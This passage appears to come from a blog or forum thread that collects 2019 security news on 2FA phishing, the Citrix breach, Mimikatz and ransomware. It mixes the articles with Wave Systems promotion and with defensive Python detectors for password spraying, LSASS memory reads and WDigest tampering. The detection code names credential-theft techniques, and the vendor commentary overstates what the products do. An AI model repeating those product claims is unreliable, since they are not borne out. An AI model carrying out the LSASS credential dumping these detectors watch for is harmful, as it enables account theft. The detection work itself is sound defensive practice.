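            note_dirs.add(ntpath.dirname(p))
    return {
        "encrypted_files": sum(by_ext.values()),
        "by_extension": dict(by_ext),
        "note_dirs": sorted(note_dirs),
    }


if __name__ == "__main__":
    print(blackholed_hosts(SAMPLE_HOSTS))
    print(ransomware_indicators(SAMPLE_LISTING))
```

A HOSTS hit on security-vendor domains is worth an alert on its own, because the ransomware writes those entries before the Azorult component phones home; finding them is the cue to rotate the browser-saved credentials the article lists even if no .promorad files are found yet.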
==================================================================
Three Wave solutions could have a tremendously positive impact against this ransomware!!
1. Wave VSC 2.0 can secure credentials and safely store them in the TPM.
2. Wave SED management with SEDs could have documents/files encrypted, and it could help provide the last layer of defense against the ransomware.
3. Wave Endpoint Monitor could spot the Trojan/malware.
==================================================================
https://www.wavesys.com/
1.
https://www.wavesys.com/products/wave-virtual-smart-card
2.
https://www.wavesys.com/products/wave-self-encrypting-drive-management
3.
https://www.wavesys.com/products/wave-endpoint-monitor
And more on 2FA:
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Google: Phishing Attacks That Can Beat Two-Factor Are on the Rise
https://www.pcmag.com/news/367026/google-phishing-attacks-that-can-beat-two-factor-are-on-the
Hackers have been refining their email phishing schemes to also nab the one-time passcode from two-factor authentication security setups, Google warns at RSA.
Don't expect two-factor authentication to always protect your accounts. Google has noticed an unsettling increase in phishing attacks that can defeat the security setup.
"We've seen a big rise in the number of phishable 2FA attacks," Nicolas Lidzborski, a security engineering lead for Gmail, said during a talk at the RSA cybersecurity show.
These "2FA phishing attacks" work by tricking the victim into handing over their password and a special one-time passcode protecting the Gmail account. Normally, this one-time passcode is hard to obtain since it's generated on a person's smartphone and expires after 30 seconds.
However, Lidzborski said hackers have been refining their password-stealing schemes to also nab the one-time passcode. So-called "phishing kits" steal a victim's password and two-factor authentication passcode as they type it into deceptive email and login pages, and then quickly break into the affected account within the 30-second time limit.
"2FA is much better than single factor, using a username and password. There's no doubt about it," he said. "However, we've seen attackers actively try to defeat 2FA."
In December, Amnesty International said it noticed one hacking group defeating two-factor protection through the help of an automated phishing attack that can steal and plug in the passcodes before the 30-second time limit runs out. A month later, a security researcher released an open source toolkit, which can also create phishing pages to defeat two-factor.
It doesn't help that the one-time passcode generated over two-factor authentication can also sometimes be sent over SMS messaging. That can make two-factor authentication vulnerable to SIM swapping attacks, in which the hacker impersonates a target to steal their mobile phone number from the wireless carrier.
"This is the loophole. People can potentially go after the phone provider, get the number transferred and get the 2FA," he added.
During the talk, Lidzborski said Google has been trying to protect Gmail accounts from successful phishing attacks by blocking login attempts from unfamiliar geographic locations. The company's email service can also warn you about emails that appear to be phishing attempts and about the dangers of clicking the suspicious links inside them.
But to stay protected, Lidzborski recommends users and businesses adopt a hardware-based solution: USB security keys. They work by supplanting the one-time passcodes in two-factor authentication with a physical piece of hardware, which you can plug into your PC to access your internet accounts. In July, Google reported that it had given all its employees security keys as a way to stop account takeovers on work-related accounts in their tracks.
Unfortunately, security keys aren't cheap. Google's own product costs $50 for two keys. However, Lidzborski said the technology can make an organization "unphishable."
"If you get phished, you have to really invest into the next level," Lidzborski told PCMag. "It is painful internally to switch to unphishable 2FA. But until you do so, the attacker will succeed ultimately."
Lidzborski couldn't quantify the exact rise in two-factor phishing attacks Google has seen. On average, the company encounters 100 million phishing messages per day. But in the past only the most sophisticated hackers, such as nation-state cyberspies, employed phishing attacks that could defeat two-factor authentication, he said. "Now it's available as an open-source phishing framework," he added. "So it is an order of magnitude more prevalent than before."
The news is a reminder to be cautious around your email inbox. Phishing emails can often look like legitimate services, such as Google, and will try to trick you into visiting an official-looking login page, when in reality the site is designed to steal your passwords. To teach the public how to spot phishing attacks, Google's Jigsaw last month helped develop a phishing quiz, which can teach you more about the threat.
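The article explains the difference in words: a one-time passcode is something the user types, so a live phishing kit can relay it inside the 30-second window, while a hardware key signs a challenge that is tied to the site the browser is really talking to. The script below is an added example (not Google's code, not a phishing kit, and not Wave's product) that plays both logins against a toy server. The origins, password and TOTP secret are constructed; the device-bound factor stands in for a security key or a TPM-backed virtual smart card like the one described earlier on this page, and is modelled with an HMAC key for brevity, whereas real hardware holds an asymmetric key that never leaves the chip.

```python
"""Why an OTP relay works and an origin-bound, device-held key does not.

Added example; not Google's code and not Wave's product. Origins, password,
TOTP secret and the 30 s step are constructed. The device key is modelled with
HMAC; a real security key or TPM uses an asymmetric key that cannot be copied
out, which is what keeps the attacker from minting their own signature."""
import hashlib
import hmac
import secrets
import struct

REAL_ORIGIN = "https://accounts.example.com"             # assumed
PHISH_ORIGIN = "https://accounts-example-com.evil.test"  # assumed
PASSWORD = "hunter2"                                     # constructed
TOTP_SECRET = b"12345678901234567890"                    # RFC 6238 test key
DEVICE_KEY = secrets.token_bytes(32)                     # lives in the key / TPM


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1, 30 s steps)."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return f"{code:0{digits}d}"


class Device:
    """Second factor that signs the challenge together with the origin the
    browser is actually talking to (the FIDO/U2F idea)."""
    def __init__(self, key: bytes):
        self._key = key

    def sign(self, nonce: str, origin: str) -> bytes:
        return hmac.new(self._key, f"{nonce}|{origin}".encode(), hashlib.sha256).digest()


class Server:
    def __init__(self, totp_secret: bytes, device_key: bytes):
        self._totp_secret = totp_secret
        self._device_key = device_key
        self._pending = set()

    # Factor 2 = OTP: anything the user can type, the phisher can relay.
    def login_totp(self, password: str, code: str, now: int) -> bool:
        return password == PASSWORD and hmac.compare_digest(code, totp(self._totp_secret, now))

    # Factor 2 = device-bound key: the signature covers the origin.
    def challenge(self) -> str:
        nonce = secrets.token_hex(16)
        self._pending.add(nonce)
        return nonce

    def login_bound(self, password: str, nonce: str, tag: bytes) -> bool:
        if password != PASSWORD or nonce not in self._pending:
            return False
        self._pending.discard(nonce)                       # single use
        expected = hmac.new(self._device_key, f"{nonce}|{REAL_ORIGIN}".encode(),
                            hashlib.sha256).digest()
        return hmac.compare_digest(tag, expected)


def demo(now: int = 1_700_000_000) -> dict:
    server = Server(TOTP_SECRET, DEVICE_KEY)
    device = Device(DEVICE_KEY)
    # 1. Honest login with TOTP.
    totp_legit = server.login_totp(PASSWORD, totp(TOTP_SECRET, now), now)
    # 2. Phishing kit: the victim types password + current code into the fake
    #    page; the kit replays them to the real site 5 s later, still inside
    #    the same 30 s window.
    typed_code = totp(TOTP_SECRET, now)
    totp_phished = server.login_totp(PASSWORD, typed_code, now + 5)
    # 3. Honest login with the device-bound key.
    nonce = server.challenge()
    bound_legit = server.login_bound(PASSWORD, nonce, device.sign(nonce, REAL_ORIGIN))
    # 4. Same kit as a live proxy: it forwards the real nonce, but the victim's
    #    browser has the device sign for the origin it sees (the phish site),
    #    so the tag does not verify against the real origin.
    nonce = server.challenge()
    bound_phished = server.login_bound(PASSWORD, nonce, device.sign(nonce, PHISH_ORIGIN))
    return {"totp_legit": totp_legit, "totp_phished": totp_phished,
            "bound_legit": bound_legit, "bound_phished": bound_phished}


if __name__ == "__main__":
    print(demo())
```

Step 2 is the attack the Amnesty report and the open-source toolkit automate; shortening the TOTP window does not close it, because the relay takes seconds. Step 4 fails for a structural reason (the signed data names the wrong origin), which is the "unphishable" property Lidzborski refers to, and SMS codes have neither protection.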
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
==================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
Superior User Experience
• No more tokens or smart cards to achieve two-factor authentication
• Eliminate VPN/WiFi/website passwords for faster access to resources
• No add-on software means improved OS performance
Citrix discloses security breach of internal network
https://www.zdnet.com/article/citrix-discloses-security-breach-of-internal-network/
Citrix learned of the hack from the FBI. Hackers stole business documents.
American software company Citrix disclosed today a security breach during which hackers accessed the company's internal network.
In a short statement posted on its blog, Citrix Chief Security Information Officer Stan Black said Citrix found out about the hack from the FBI earlier this week.
"On March 6, 2019, the FBI contacted Citrix to advise they had reason to believe that international cyber criminals gained access to the internal Citrix network," Black said.
"While not confirmed, the FBI has advised that the hackers likely used a tactic known as password spraying, a technique that exploits weak passwords. Once they gained a foothold with limited access, they worked to circumvent additional layers of security," the Citrix exec added.
Black said hackers accessed and downloaded business documents, but Citrix wasn't able to identify what specific documents had been stolen at the time of his announcement today.
The Citrix exec said that there is no evidence to suggest that hackers might have tampered with Citrix official software or other products.
The hack is still under investigation, and Black promised more updates on the incident as they learn more.
An NBC report published today shortly before the Citrix announcement and citing a source with Resecurity claimed that a group of Iranian state hackers called "Iridium" might be behind this hack. Resecurity said that Iridium breached Citrix's network during the Christmas 2018 holiday.
Resecurity said hackers used techniques to bypass two-factor authentication and gain access to Citrix's internal network from where they accessed roughly 6TB of information.
A Citrix spokesperson declined to comment on the NBC report and Resecurity blog post --which convey substantially different information from the company's data breach announcement-- when ZDNet reached out earlier today. Resecurity's findings have been questioned in the past.
In December 2018, Citrix reset passwords for some users of the Citrix ShareFile service after it detected a credentials stuffing attack against its customers. However, this attack is unrelated to today's data breach announcement as this targeted Citrix's customer network and customer accounts, and not its internal network and employee accounts.
Article updated with information about the NBC report, the Resecurity blog post, the December 2018 attack, and the Citrix refusal to comment.
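The FBI's suspected entry technique, password spraying, has a recognisable shape in authentication logs: one source tries a small number of common passwords against many accounts, staying under the per-account lockout threshold that would catch a brute force. The detector below is an added example (not Citrix's telemetry or any FBI method) over a constructed log in a simple "timestamp source_ip user FAIL|SUCCESS" format; addresses and user names are made up.

```python
"""Password-spray detector over a constructed authentication log.

Added example; not Citrix's telemetry or the FBI's method. The log format
(timestamp source_ip user FAIL|SUCCESS) and every address are constructed."""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

SAMPLE_LOG = """\
2019-03-01T02:00:01Z 203.0.113.7 alice FAIL
2019-03-01T02:00:03Z 203.0.113.7 bob FAIL
2019-03-01T02:00:05Z 203.0.113.7 carol FAIL
2019-03-01T02:00:07Z 203.0.113.7 dave FAIL
2019-03-01T02:00:09Z 203.0.113.7 erin FAIL
2019-03-01T02:00:11Z 203.0.113.7 frank FAIL
2019-03-01T02:00:13Z 203.0.113.7 grace FAIL
2019-03-01T02:00:15Z 203.0.113.7 heidi FAIL
2019-03-01T02:00:17Z 203.0.113.7 ivan FAIL
2019-03-01T02:00:19Z 203.0.113.7 judy FAIL
2019-03-01T02:00:21Z 203.0.113.7 ken FAIL
2019-03-01T02:00:23Z 203.0.113.7 laura FAIL
2019-03-01T02:00:25Z 203.0.113.7 mallory SUCCESS
2019-03-01T02:10:00Z 198.51.100.5 alice FAIL
2019-03-01T02:10:02Z 198.51.100.5 alice FAIL
2019-03-01T02:10:04Z 198.51.100.5 alice FAIL
2019-03-01T02:10:06Z 198.51.100.5 alice FAIL
2019-03-01T02:10:08Z 198.51.100.5 alice FAIL
2019-03-01T02:10:10Z 198.51.100.5 alice FAIL
2019-03-01T02:15:00Z 192.0.2.9 carol FAIL
2019-03-01T02:15:30Z 192.0.2.9 carol SUCCESS
"""

Event = Tuple[datetime, str, str, str]


def parse_log(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user.lower(), result))
    return sorted(events)


def detect_spray(text: str, window_minutes: int = 10, min_accounts: int = 8,
                 max_fails_per_account: int = 3) -> Dict[str, dict]:
    """One source, many accounts, few guesses each: that is a spray.
    Many guesses against one account (198.51.100.5 above) is a brute force,
    deliberately not matched here; lockout policy handles that one. A single
    typo followed by success (192.0.2.9) is ignored too."""
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for ev in parse_log(text):
        by_ip[ev[1]].append(ev)
    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        recent: deque = deque()                    # sliding window per source
        for ts, _, user, result in evs:
            recent.append((ts, user, result))
            while ts - recent[0][0] > window:
                recent.popleft()
            fails = Counter(u for _, u, r in recent if r == "FAIL")
            if len(fails) >= min_accounts and max(fails.values()) <= max_fails_per_account:
                hits = {u for _, u, r in recent if r == "SUCCESS"}
                a = alerts.setdefault(ip, {"accounts_tried": 0, "logged_in": set(),
                                           "first_seen": recent[0][0]})
                a["accounts_tried"] = max(a["accounts_tried"], len(fails))
                a["logged_in"] |= hits              # the foothold the FBI described
    for a in alerts.values():
        a["logged_in"] = sorted(a["logged_in"])
    return alerts


if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))
```

Feed it Windows 4625/4624 events, VPN or ADFS logs in the same four-column shape. The "logged_in" field is the part that matters for response: a success from a spraying source is the account to disable first, and the reason the Citrix statement talks about a "foothold with limited access".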
==================================================================
It's hard to believe that Citrix wouldn't be using some form of enterprise two-factor authentication to protect its sensitive information. Weak passwords were their protection?!? If their two-factor authentication was bypassed or if they are still using weak passwords, it's time for Citrix and other organizations to take advantage of the many awesome positives by using Wave VSC 2.0!!!
=================================================================
https://www.wavesys.com/
Major Windows 7 zero-day discovered, enables privilege escalation in combination with another Chrome exploit
https://www.techspot.com/news/79089-major-windows-7-zero-day-discovered-enables-privileged.html
Microsoft believes it only affects Windows 7 32-bit systems
Why it matters: Google's Threat Analysis Group released details on Thursday of an exploit that allows privilege escalation in Windows when used in conjunction with a recently patched Google Chrome vulnerability. Google recommends that Chrome users restart their browser to ensure the patches are applied. Microsoft recommends that users update to Windows 10.
Security researchers at Google and Microsoft have observed attackers using a combination of a patched Chrome vulnerability and an unpatched Windows vulnerability to take advantage of Windows 7 systems. The announcement of the issue comes as part of their responsible vulnerability disclosure policy.
The Windows bug is a null pointer dereference in the win32k.sys kernel driver, while the Chrome bug is a use-after-free in the FileReader component. Both of these bugs deal with accessing memory that should not be accessed by the user.
Most modern web browsers use a "sandbox" to help protect against online attacks. This is similar to a virtual environment that websites and their associated code run in. These sandboxes are supposed to ensure that untrusted code can't get out and access system resources, but combining these two bugs allows for just that. Once code has broken out of the sandbox, it can access sensitive parts of the operating system and users' files.
Google patched this vulnerability last Friday, but unlike most updates which take effect immediately, this patch requires a manual restart by the user. The Windows vulnerability has yet to be patched but Microsoft believes it only affects Windows 7 32-bit systems. In the meantime, Microsoft is recommending that all users still running Windows 7 should upgrade to Windows 10.
=================================================================
I think what the article is saying is that once code has broken out of the sandbox, the hacker with the code can access sensitive parts of the operating system and users' files. Information there can be used to log into a user's computer and the network and escalate privileges on a computer. If the users had Wave VSC 2.0, the sensitive information to log onto a computer can't be used to log on since the hacker doesn't have the computer (TPM)!! The stopping of privilege escalation (using Wave VSC 2.0) could protect the users and keep them from having to upgrade to Windows 10. A summary of Wave VSC 2.0 is at the link below. The Wave ERAS link also helps!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
12,449 Data Breaches Confirmed in 2018, a 424% Increase Over the Previous Year
https://www.bleepingcomputer.com/news/security/12-449-data-breaches-confirmed-in-2018-a-424-percent-increase-over-the-previous-year/
The number of confirmed data breaches during 2018 reached 12,449, a 424% increase when compared with 2017, 47% of all compromised identity records having been exposed in breaches experienced by organizations from the United States and China.
4iQ, the identity intelligence company which published this report on the breached data landscape and trends, also discovered that, while the number of breaches saw a substantial boost last year, the average breach size decreased to 216,884 records, a value 4.7 times smaller than the year before.
The company defines data breaches as confirmed incidents "where credentials, personal, medical, financial or other records with sensitive data have been accessed or disclosed due to being hacked or leaked, either deliberately or by accident."
The United States leads the ranks in the number of identity records exposed
The report also unearths the fact that crooks also switched their attention from harder to infiltrate large organizations and corporations to the less protected small businesses, a trend which also contributed to the massive four times increase in the number of breaches detected during 2018.
While on the whole United States data breaches haven't been as numerous as the ones from other countries, the size of the breaches contributed heavily to the large number of identity records being exposed throughout the year as part of US incidents, roughly 32% of the total number of curated records detected in such incidents around the world.
2018 also saw an important 71% jump in underground activity, with 14.9 billion raw identity stolen records being circulated and exchanging hands, although only 3.6 billion of them were new and authentic.
"As our personal data continues to get exposed and circulated in underground markets, the problem of identity-based attacks is only growing," said 4iQ CEO Monica Pal.
Also, "Consumers need to do what they can to prevent problems, like enable two-factor authentication, use a password manager, etc. but then they also need to take a proactive approach to protect themselves by signing up for identity theft protection services which include exposure alerts and help with remediation and insurance."
During 2018 breaches became "the new normal"
In addition, "Government was the largest growing exposed sector in 2018, increasing over 291 percent from 2018," said 4iQ co-founder and CTO Julio Casal. "This may be the result of mid-term elections and increasing geopolitical tensions. For the first time, we saw underground brokers actively including citizen data, such as voter databases, as part of their data portfolio."
2018 was also the year of Internet-connected data storage devices left exposed for everyone to access, which could translate into a more careful approach during 2019, with companies and organizations being more careful when securing their databases.
4iQ also highlights the same big data breaches impacting large companies that led to millions of identity records being exposed per incident:
2018 saw companies like Google, Facebook, and Marriott make headlines as well. With new breaches being reported on an almost daily basis, “breach fatigue” has set in, with their occurrence becoming the “new normal.”
4iQ's 2019 Identity Breach Report uses data assembled from a far-reaching collection of both leaked and breached data obtained from open sources available on the surface, deep and dark web, as well as from black markets, social media, and underground forums and communities.
This data was collected with the help of automated crawlers and it was analyzed by the company's breach-hunting team using data curation and verification methodology and tools.
==================================================================
The existing solutions for preventing breaches based on the statistics in this article haven't been working very well. Why not try something that really works like Wave VSC 2.0?!! The trend should be getting better with time and with the right solutions. The cybersecurity results have been in disarray for far too long. Wave's cybersecurity solutions could be a great addition to a LOT of organizations and have an extremely positive impact on organizations' cyber defenses.
=================================================================
https://www.wavesys.com/
What is Mimikatz? And how to defend against this password stealing tool
https://www.csoonline.com/article/3353416/what-is-mimikatz-and-how-to-defend-against-this-password-stealing-tool.html?utm_source=twitter&utm_medium=social&utm_campaign=organic
Mimikatz is a powerful tool when attacking — or defending — Windows systems. Here's what you need to know to get up to speed.
Mimikatz definition
Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers.
Mimikatz, described by the author as just "a little tool to play with Windows security,” is an incredibly effective offensive security tool developed by Benjamin Delpy. It is used by penetration testers and malware authors alike. The destructive 2017 NotPetya malware rolled leaked NSA exploits like EternalBlue together with Mimikatz to achieve maximum damage.
Originally conceived as a research project by Delpy to better understand Windows security, Mimikatz also includes a module that dumps Minesweeper from memory and tells you where all the mines are located.
Mimikatz is not difficult to use, and Mimikatz v1 comes bundled as a meterpreter script as part of Metasploit. The new Mimikatz v2 upgrade has not yet been integrated into Metasploit as of this writing.
The name "mimikatz" comes from the French slang "mimi" meaning cute, thus "cute cats." (Delpy is French and he blogs on Mimikatz in his native language.)
How does Mimikatz work?
Mimikatz exploits Windows single sign-on (SSO) functionality to harvest credentials. Until Windows 10, Windows by default used a feature called WDigest that loads encrypted passwords into memory, but also loads the secret key to decrypt them. WDigest has been a useful feature for authenticating large numbers of users on an enterprise or government network, but also lets Mimikatz exploit this feature by dumping memory and extracting the passwords.
In 2013, Microsoft made it possible to disable this feature as of Windows 8.1, and it is disabled by default in Windows 10. However, Windows still ships with WDigest, and an attacker who gains administrative privileges can simply turn it on and run Mimikatz.
The rest of the article is at the link.
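The two sentences above describe a concrete, checkable state: whether the WDigest provider is caching plaintext-recoverable credentials on a host, and the act of reading them out of LSASS memory. The script below is an added example (not Mimikatz, not a vendor rule) with one check for each. The registry dumps mimic the output of `reg query` on the WDigest key but are constructed, and the Sysmon Event ID 10 (ProcessAccess) records and PROCESS_VM_READ mask come from general Windows knowledge rather than from the article.

```python
"""Two checks against the Mimikatz technique described above.

Added example, not Mimikatz code and not a vendor rule. The registry dumps
and Sysmon records are constructed; Sysmon Event ID 10 (ProcessAccess) and the
PROCESS_VM_READ access bit are general Windows facts the article does not
mention."""
import re
from typing import Dict, List, Optional

# Constructed output of:
#   reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
REG_TAMPERED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debug                 REG_DWORD    0x0
    Negotiate             REG_DWORD    0x0
    UTF8HTTP              REG_DWORD    0x1
    UseLogonCredential    REG_DWORD    0x1
"""
REG_DEFAULT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debug                 REG_DWORD    0x0
    Negotiate             REG_DWORD    0x0
    UTF8HTTP              REG_DWORD    0x1
"""


def use_logon_credential(reg_output: str) -> Optional[int]:
    m = re.search(r"UseLogonCredential\s+REG_DWORD\s+0x([0-9A-Fa-f]+)", reg_output)
    return int(m.group(1), 16) if m else None


def wdigest_caches_plaintext(reg_output: str, pre_8_1: bool) -> bool:
    """True when LSASS keeps reversible WDigest credentials in memory.
    pre_8_1: Windows 7/8/2008 R2/2012, where caching stays on unless
    KB2871997 is installed AND the value is explicitly 0. Windows 8.1/2012 R2
    and later default to off when the value is absent; setting it to 1 turns
    caching back on, which is the "simply turn it on" step the article
    describes. Alert on any change to this value, not only on its content."""
    value = use_logon_credential(reg_output)
    if value is None:
        return pre_8_1
    return value != 0


PROCESS_VM_READ = 0x0010  # needed to read credential material out of LSASS
TRUSTED_READERS = {       # assumed allowlist; tune per environment
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

SYSMON_EVENTS: List[Dict[str, object]] = [  # constructed Event ID 10 records
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Users\Public\mimikatz.exe"},
]


def lsass_read_alerts(events: List[Dict[str, object]]) -> List[str]:
    """Source images that opened lsass.exe with PROCESS_VM_READ and are not
    on the allowlist. 0x1010 and 0x1410 are masks commonly seen from the
    sekurlsa module; 0x1000 alone (query limited information) is benign."""
    alerts = []
    for e in events:
        if e.get("EventID") != 10:
            continue
        if not str(e["TargetImage"]).lower().endswith(r"\lsass.exe"):
            continue
        if str(e["SourceImage"]).lower() in TRUSTED_READERS:
            continue
        if int(str(e["GrantedAccess"]), 16) & PROCESS_VM_READ:
            alerts.append(str(e["SourceImage"]))
    return alerts


if __name__ == "__main__":
    print(wdigest_caches_plaintext(REG_TAMPERED, pre_8_1=False))
    print(lsass_read_alerts(SYSMON_EVENTS))
```

The access-mask check is a baseline, not a complete answer: a renamed binary, a dump taken with a signed tool and parsed offline, or a direct handle duplicated from a privileged process all read LSASS without looking like mimikatz.exe. The registry check complements it because the attacker has to flip UseLogonCredential and wait for a fresh logon before WDigest plaintext is there to dump, which is a window the defender can watch.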
==================================================================
The hacker will have to gain administrative privileges on a computer to simply turn on WDigest and run Mimikatz. Wave VSC 2.0 could prevent the hacker from doing that with the PIN stored in the TPM and the TPM as a second factor of authentication.
Post exploitation to move laterally across the network wouldn't work for hackers either since they would have to have the computer(TPM) and PIN.
Stopping Mimikatz is a great reason for organizations to be using Wave VSC 2.0!!!
In the article, the author says that Mimikatz will likely remain an effective offensive security tool on Windows platforms for many years to come.
If Wave VSC 2.0 is used defensively by organizations the Mimikatz offensive tool (used by hackers) could be thwarted.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Why Ransomware Is Still An Active Threat
https://www.eweek.com/security/why-ransomware-is-still-an-active-threat
RSA Conference 2019: Ransomware in 2019 doesn't have the same volume as it did in 2017, but that doesn't mean it isn't an impactful threat.
SAN FRANCISCO - For several years, ransomware was a rising threat, causing hundreds of millions of dollars in damages and disrupting operations around the world.
But what is the state of ransomware in 2019? In a session at the RSA Conference here, a pair of McAfee researchers detailed how the threat landscape for ransomware has changed and where it is headed. They also provided insight into what organizations can now do to help minimize the risk of being a victim of ransomware.
"There is a myth that ransomware is dying, but it's not," Raj Samani, Chief Scientist, McAfee told eWEEK in an interview. "We've seen a lot of activity with Gandcrab over the last 12-24 months and that's not going away."
Ransomware is an attack in which a victim's system is somehow compromised or infected with some form of malware, which then encrypts user data. The user is then asked to pay a fee, or a 'ransom' to the attacker in order to get their data back.
Gandcrab is a particularly virulent form of ransomware that has been successful at infecting users. Samani said that it has been a game of 'cat and mouse' between Gandcrab and the cyber-security industry.
Samani noted that the NoMoreRansom project, which is a multi-stakeholder effort to help individuals and end users protect themselves against ransomware, posted a new version of a decrypter tool for Gandcrab at the end of February. Within hours of the decrypter tool release, Samani said that the Gandcrab authors had already released a new version of the ransomware that the tool wasn't able to decrypt.
Gandcrab
So what exactly is Gandcrab? Samani said that it's a ransomware-as-a-service operation, where any hacker can make use of the service to launch their own attack.
Samani said that by looking at the underlying code infrastructure of Gandcrab, it's possible to map out the affiliates that are using the ransomware. In the Gandcrab ransomware as a service model the operators and developers of Gandcrab have affiliates that target victims. The affiliates will then pay the primary Gandcrab operators a percentage of the ransom, when a victim pays.
While Gandcrab is still an active risk, one thing that has changed is the volume of new ransomware families. In the fourth quarter of 2017, Samani said that there was approximately 2.2 million new ransomware samples. By the second quarter of 2018 the volume of new ransomware declined to just over one million.
"New ransomware growth is significantly lower than we had once expected, but that only tells part of the story," he said.
The other part of the story is that while new ransomware has declined, organizations, as opposed to random individuals, are being increasingly targeted. Samani said that for example the Ryuk ransomware family only goes after a limited number of companies. He said that while broad-based ransomware attackers like CryptoLocker only tended to ask for approximately $400 in ransom, Ryuk tends to ask for $100,000 or more. Rather than a random form of infection, Ryuk often gets into organizations by exploiting Remote Desktop Protocol (RDP).
"The noisy ransomware with lots of attack volume are certainly still around but they are not as prevalent as they were before," Samani said. "Now we're seeing more criminal operations, doing research in the organizations they attack and then dropping in ransomware."
Samani said that Ryuk for example has made $4 million in ransom in the past five months.
"So, the overall volume may have decreased but the impact to companies has increased," he added.
How To Defend Against Ransomware
In 2016, McAfee was one of a number of firms that helped to start the NoMoreRansom effort, which Samani said has had a positive impact on reducing the risk of ransomware attacks. Samani said that one of the goals of the RSA Conference talk is to encourage more companies and groups to join NoMoreRansom and support the effort to eliminate ransomware.
NoMoreRansom now has over 85 tools available to help combat ransomware and benefits from the support of over 140 vendors and organizations.
Aside from NoMoreRansom, Samani said that the single most important thing that any organization can do to help minimize the risk of ransomware is to have a backup of their data. While backing up data might seem like common sense, there are still many organizations that don't do it.
Samani said that data security is still a somewhat abstract idea for many organizations. He said that data breaches are often reported in terms of how many records were lost, but rarely, if ever do reports actually quantify the impact on real people and organizations.
"Everybody is aware about cyber-security risks and yet, how many people back up their data?" Samani said. "I don't think the issue is a lack of awareness. I think the issue is a lack of understanding."
Overall, Samani said that in his view cyber-security isn't all that hard, the simplest things for a user to do are to change passwords regularly, not to click on un-known links in emails and have a backup.
"If every single person did those things how many threats would we see? It would be reduced by 90 percent," he said.
=================================================================
At the end of the article there were three things to do for cybersecurity, and for enterprises, Wave offers some better solutions:
1. Changing passwords can be substituted with the better (2FA) program in Wave VSC 2.0.
2. Most users click on links that are creatively disguised, and phished credentials can be protected by Wave VSC 2.0 with a second factor of authentication in the TPM.
3. Backups are good, but some ransomware encrypts the backups as well. SEDs and Wave SED management is an important final layer to stop the ransomware. The malware aspect of the ransomware could be sneaky, and Wave Endpoint Monitor as a layer of protection could spot that malware better than other antivirus software.
=================================================================
RDP is remote desktop protocol and one of the options that ransomware can exploit. One of Wave VSC 2.0's key features is remote desktop access. The Wave VSC 2.0 (2FA) could keep the ransomware from exploiting the RDP.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/
If an organization has been breached, it’s more likely to be targeted again
https://www.helpnetsecurity.com/2019/03/05/breach-response-times-improvements/
FireEye released the Mandiant M-Trends 2019 report at the RSA Conference. The report shares statistics and insights gleaned from Mandiant investigations around the globe in 2018.
Key findings
Dwell time decreasing as organizations improve detection capabilities – In 2017, the median duration between the start of an intrusion and the identification by an internal team was 57.5 days. In 2018 this duration decreased to 50.5 days. While organizations are getting better and faster at discovering breaches internally, rather than being notified by an outside source such as law enforcement, there is also a rise in disruptive, ransom, or otherwise immediately visible attacks. The global median dwell time before any detection – external or internal – has also decreased by almost one month – going from 101 days in 2017 to 78 days in 2018. The same measurement was as high as 416 days back in 2011.
